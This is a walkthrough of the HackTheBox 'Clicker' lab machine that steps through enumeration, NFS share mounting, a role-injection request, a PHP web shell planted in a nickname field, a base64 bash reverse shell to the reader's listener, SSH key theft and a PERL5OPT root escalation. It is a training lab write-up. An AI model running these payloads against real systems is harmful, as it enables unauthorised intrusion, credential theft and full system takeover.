Clicker — HackTheBox Machine Simple Writeup by Karthikeyan Nagaraj | 2024
2024-2-2 12:12:23 Author: infosecwriteups.com(查看原文) 阅读量:15 收藏

HackTheBox’s Medium Machine — Clicker | Approach and Walkthrough with Hints

Karthikeyan Nagaraj

InfoSec Write-ups

  1. Enumeration and Analysis
  2. Initial Foothold
    1. Port — 2049
    2. Port — 80
    3. User.txt
    4. Alternate Option to get into the Machine
  3. Privilege Escalation
  4. Simple Video Poc ( For section 2.4 )

Note: I’m unable to do an elaborated writeup for now, hope will post soon.

  1. Start the VPN and Perform a basic Nmap scan:
    nmap -sC -sV 10.10.11.232

2. Open 10.10.11.232 in a Browser, it will show the hostname after the redirection.

3. Now, Add the hostname to /etc/hosts file using the following command to access the clicker.htb —
echo “10.10.11.232 clicker.htb” | sudo tee -a /etc/hosts

4. Then, perform a Directory Enumeration using the following command dirsearch -u clicker.htb -e*
(or)
gobuster dir -u http://clicker.htb/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

5. Similarly, perform a DNS Enumeration using the following command — gobuster dns -d clicker.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 20

1. Port — 2049

  1. Let’s look at port 2049 which is used by the Network File System (NFS) for remote filesystem access. It's a client/server system that lets users access files across a network and treat them as if they were in a local file directory.
  2. To explore the available network shares on the Clicker machine, execute the following commandshowmount -e clicker.htb and explore potential entry points for investigation.
  3. Then use the below commands to mount the shares
    sudo mkdir /mnt/nfs
    sudo mount clicker.htb:/ /mnt/nfs -o nolock
    cd /mnt/nfs/mnt/backups
    cp clicker.htb_backup.zip LOCATION_TO_UNZIP
  4. After Unzipping the File, we can see the website code which will be useful for inspecting the website.

2. Port — 80

  1. On Enumerating the webpage with a comparison to the files that we got from the victim machine, we get to know that there is a flaw in the web application that lets us execute Arbitrary Commands.
  2. To do that, create an Account and log in to that.
  3. Click play, turn on the intercept, and proxy On.
  4. Click save, capture the request, modify the parameters below, and send the request:
    /save_game.php?clicks=1&level=1&role%0a=Admin
  5. The Above request will make us Admin. Log out and log in again and you’ll see an Administrator Panel.
  6. Click play and capture the request of the /save_game.php
  7. Now add the parameter at the end of the request
    &nickname=<%3fphp+system($_GET[‘cmd’])+%3f>
  8. Go to home, Click on Administration click Export, and capture the request.
  9. Change the extension to PHP and send the request.
  10. Open a Terminal and type nc -lvnp 4444 to start a listener.
  11. Open another Terminal and enter the following command by replacing your IP
    echo “sh -i >& /dev/tcp/<your ip>/4444 0>&1” | base64
  12. Now go to the link, add your rev shell code that you got above and the filename that you exported.
    https://clicker.htb/exports/FILENAME.PHP?echo “<encoded base64 rev shell code>” | base64 -d | bash
  13. If you did everything right then you’ll get a reverse shell on the listener, or else you can use the 4-section Alternate option to get into the machine.

3. User.txt

  1. On Inspecting every directory, we got something interesting in /opt/manage/ the directory.
  2. Which is an executable script used to read, modify, and update SQL statements, etc..
  3. We can use that to read the private SSH key of the user.
  4. Type the below commands to do that:
    cd /opt/manage/
    ./execute_query 5 ../.ssh/id_rsa
  5. Then it will display the SSH key of the user, copy that, and paste that into a file in your machine without any extension. Use
    nano KEY_FILENAME
  6. In your machine, type the following command — Make sure that the key is in the current directory:
    chmod 600 KEY_FILENAME
    ssh [email protected] -i KEY_FILENAME
  7. Now you can get the user.txt

4. Alternate Option to get into the Machine:

  1. I’m providing this section only for those who are making mistakes in getting into the machine. I hope you will use this section temporarily. Make sure to fix any mistakes that you have made in getting the reverse shell.
  2. So to get into the machine, you can use the SSH private key of the user jack which you can get here

3. After you downloaded the file, follow the steps in section 3 to get the user.txt

  1. Let’s start with sudo -l . The sudo -l command is used to list the allowed (or prohibited) commands for the invoking user on the current host. This command provides information about the user's sudo privileges, specifically showing which commands they are allowed to execute with elevated privileges.
  2. Which reveals a script /opt/monitor.sh
  3. On Inspecting the file we get to know that the file is associated with the vulnerability called perl startup privilege escalation
  4. Type the below commands to get root:
    sudo PERL5OPT=-d PERL5DB=’exec “chmod u+s /bin/bash”’ /opt/monitor.sh
    bash -p

A YouTube Channel for Cybersecurity Lab’s Poc and Write-ups

Telegram Channel for Free Ethical Hacking Dumps

Thank you for Reading!

Happy Ethical Hacking ~

Author: Karthikeyan Nagaraj ~ Cyberw1ng


文章来源: https://infosecwriteups.com/clicker-hackthebox-machine-simple-writeup-by-karthikeyan-nagaraj-2024-313b383236bd?source=rss----7b722bfd1b8d---4
如有侵权请联系:admin#unsafe.sh